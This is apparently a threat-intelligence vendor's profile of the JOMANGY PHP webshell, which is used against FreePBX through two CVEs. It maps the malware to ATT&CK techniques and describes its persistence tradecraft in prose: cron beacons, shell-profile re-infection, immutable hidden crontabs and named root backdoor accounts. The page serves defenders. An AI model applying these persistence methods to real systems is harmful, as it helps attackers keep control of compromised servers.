Skip to main content
Meet us at Black Hat USA 2026— Las Vegas, August 1–6Book a Meeting
Mallory
MalwareUsed by 1 actorExploits 2 CVEs

JOMANGY

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

EXPLOITED CVES

Vulnerabilities exploited

2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

2 CVES
CVE-2025-64328OS Command Injection in Sangoma FreePBX Endpoint Manager Filestore ModuleExploited in the wild

Forensics point to two high-confidence flaws tracked as CVE-2025-64328 and CVE-2025-57819. Many systems remain exposed because administrators fail to apply patches promptly. | Analysts named this unique finding the JOMANGY webshell. According to the official report, “JOMANGY is a PHP webshell family with no prior public documentation”.

via security online infosecurityonline.info
CVE-2025-57819Unauthenticated SQL Injection and RCE in FreePBX Endpoint ManagerExploited in the wild

Forensics point to two high-confidence flaws tracked as CVE-2025-64328 and CVE-2025-57819. Many systems remain exposed because administrators fail to apply patches promptly. | Analysts named this unique finding the JOMANGY webshell. According to the official report, “JOMANGY is a PHP webshell family with no prior public documentation”.

via security online infosecurityonline.info
THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
INJ3CTOR3

Analysts named this unique finding the JOMANGY webshell. According to the official report, “JOMANGY is a PHP webshell family with no prior public documentation”.

via security online infosecurityonline.info
MITRE ATT&CK

Techniques & procedures

17 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique
T1190Exploit Public-Facing ApplicationEvidence2

Ultimately, the FreePBX exploitation campaign relies on known security loopholes for initial access. Forensics point to two high-confidence flaws tracked as CVE-2025-64328 and CVE-2025-57819.

Execution

3 techniques
T1053.003CronEvidence2

Specifically, the threat actor establishes six independent survival channels on infected devices. These tracks include recurring cron polling...

T1059Command and Scripting InterpreterEvidence1

CVE-2025-64328 is a post-authentication command injection flaw in the FreePBX filestore module

T1059.006PythonEvidence1

The sixth is a PHP executor in the FreePBX high-availability module providing privileged command execution independently of all other channels.

Persistence

6 techniques
T1037Boot or Logon Initialization ScriptsEvidence1

The second fires a re-infection payload on every root login and system reboot by injecting code into shell profile files.

T1037.004RC ScriptsEvidence1

Specifically, the threat actor establishes six independent survival channels on infected devices. These tracks include ... shell profile insertion ...

T1053.003CronEvidence2

Specifically, the threat actor establishes six independent survival channels on infected devices. These tracks include recurring cron polling...

T1136Create AccountEvidence1

The infection also quietly drops 18 backdoor accounts across three tiers. Nine carry full root-equivalent privileges, eight operate at the service account level, and one is injected into the FreePBX web panel database via MySQL.

T1136.001Local AccountEvidence1

Backdoor Account newfpbx, newfpbxs, xhimax UID-0 OS backdoor accounts created via base64-obfuscated useradd commands

T1505.003Web ShellEvidence2

To begin with, the core weapon in this operation is a new malware strain. Analysts named this unique finding the JOMANGY webshell. According to the official report, “JOMANGY is a PHP webshell family with no prior public documentation”.

Privilege Escalation

3 techniques
T1037Boot or Logon Initialization ScriptsEvidence1

The second fires a re-infection payload on every root login and system reboot by injecting code into shell profile files.

T1037.004RC ScriptsEvidence1

Specifically, the threat actor establishes six independent survival channels on infected devices. These tracks include ... shell profile insertion ...

T1053.003CronEvidence2

Specifically, the threat actor establishes six independent survival channels on infected devices. These tracks include recurring cron polling...

Stealth

3 techniques
T1027Obfuscated Files or InformationEvidence2

This hidden script uses a double-layer obfuscation scheme consisting of Base64 encoding over ROT13.

T1070Indicator RemovalEvidence1

When it executes, it aggressively cleanses the environment of other cybercriminals. For example, the payload scans for fifty distinct third-party webshell signatures. It deletes competing files... Concurrently, the code performs a self-eviction routine against its own older campaign files.

T1564.001Hidden Files and DirectoriesEvidence1

The third stores eight immutable crontab copies in hidden directories

Defense Impairment

1 technique
T1222File and Directory Permissions ModificationEvidence1

The third stores eight immutable crontab copies in hidden directories, protected by a file attribute that silently blocks deletion even by root

Discovery

2 techniques
T1057Process DiscoveryEvidence1

The fourth is a process watchdog that immediately re-downloads the dropper if the beacon processes disappear.

T1083File and Directory DiscoveryEvidence1

For example, the payload scans for fifty distinct third-party webshell signatures.

Command and Control

1 technique
T1071Application Layer ProtocolEvidence1

The first channel polls the attacker’s command-and-control server every one to three minutes via scheduled cron jobs

Other

1 technique
T1562Impair DefensesEvidence1

It deletes competing files and blocks eleven adversary control servers bidirectionally.

INDICATORS OF COMPROMISE

IOCs tracked for this family

15 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
5 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
5 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
5 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
ip.v4●●●●●●●●●●●●View more in app1 month ago
uri●●●●●●●●●●●●View more in app1 month ago
ip.v4●●●●●●●●●●●●View more in app1 month ago
uri●●●●●●●●●●●●View more in app1 month ago
hash.sha1●●●●●●●●●●●●View more in app1 month ago
ip.v4●●●●●●●●●●●●View more in app1 month ago
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching15

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution1

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities2

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping17

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.